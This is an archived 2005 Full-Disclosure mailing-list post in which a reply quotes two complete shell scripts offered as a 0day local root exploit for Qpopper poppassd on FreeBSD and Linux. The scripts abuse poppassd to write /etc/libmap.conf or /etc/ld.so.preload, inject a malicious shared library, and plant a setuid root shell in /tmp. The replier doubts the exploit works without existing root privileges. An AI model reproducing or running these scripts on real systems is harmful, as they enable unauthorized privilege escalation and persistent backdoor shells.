lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sun Sep 25 14:46:14 2005
From: hhoffman at ip-solutions.net (Harry Hoffman)
Subject: It's time for some warez - Qpopper poppassd
	local	r00t exploit

Umm, am I missing something here? It looks like you need to be root to 
run this "program"?

In the fbsd one you are trying to write to /etc which has perms:
drwxr-xr-x  17 root  wheel  2560 Sep  9 13:49 etc

and in the linux one you do a set{gid,uid} to 0.

both of these actions will fail without having root priv already.



kcope wrote:

> hello this is kcope,
> here is my Qpopper poppassd local r00t exploit (latest version, 0day) 
> both for linux and freebsd systems... have fun 8-)#
>
>------------------------------------------------------------------------
>
>#!/bin/sh
>###########################################################################
># FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
># tested on FreeBSD 5.4-RELEASE											###
>###########################################################################
>
>POPPASSD_PATH=/usr/local/bin/poppassd
>HOOKLIB=libutil.so.4
>
>echo ""
>echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
>echo ""
>sleep 2
>umask 0000
>if [ -f /etc/libmap.conf ]; then
>echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
>exit
>fi
>cat > program.c << _EOF
>#include <unistd.h>
>#include <stdio.h>
>#include <sys/types.h>
>#include <stdlib.h>
>
>void _init()
>{
>  if (!geteuid()) {
>  remove("/etc/libmap.conf");
>  execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
>  }
>}
>
>_EOF
>gcc -o program.o -c program.c -fPIC
>gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
>cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>echo "--- Now type ENTER ---"
>echo ""
>$POPPASSD_PATH -t /etc/libmap.conf
>echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
>su
>if [ -f /tmp/xxxx ]; then
>echo "IT'S A ROOTSHELL!!!"
>/tmp/xxxx
>else
>echo "Sorry, exploit failed."
>fi
>  
>
>------------------------------------------------------------------------
>
>#!/bin/sh
>###########################################################################
># Linux Qpopper poppassd latest version local r00t exploit by kcope   	###
># August 2005								###
># Confidential - Keep Private!						###
>###########################################################################
>
>POPPASSD_PATH=/usr/local/bin/poppassd
>
>echo ""
>echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
>echo ""
>sleep 2
>umask 0000
>if [ -f /etc/ld.so.preload ]; then
>echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
>exit
>fi
>cat > program.c << _EOF
>#include <unistd.h>
>#include <stdio.h>
>#include <sys/types.h>
>#include <stdlib.h>
>
>void _init()
>{
>  if (!geteuid()) {
>  setgid(0);
>  setuid(0);
>  remove("/etc/ld.so.preload");
>  execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
>  }
>}
>
>_EOF
>gcc -o program.o -c program.c -fPIC
>gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
>cat > suid.c << _EOF
>int main(void) {
>        setgid(0); setuid(0);
>        unlink("/tmp/suid");
>        execl("/bin/sh","sh",0); }
>_EOF
>
>gcc -o /tmp/suid suid.c
>cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>echo "--- Now type ENTER ---"
>echo ""
>$POPPASSD_PATH -t /etc/ld.so.preload
>echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload
>su
>if [ -f /tmp/suid ]; then
>echo "IT'S A ROOTSHELL!!!"
>/tmp/suid
>else
>echo "Sorry, exploit failed."
>fi
>  
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ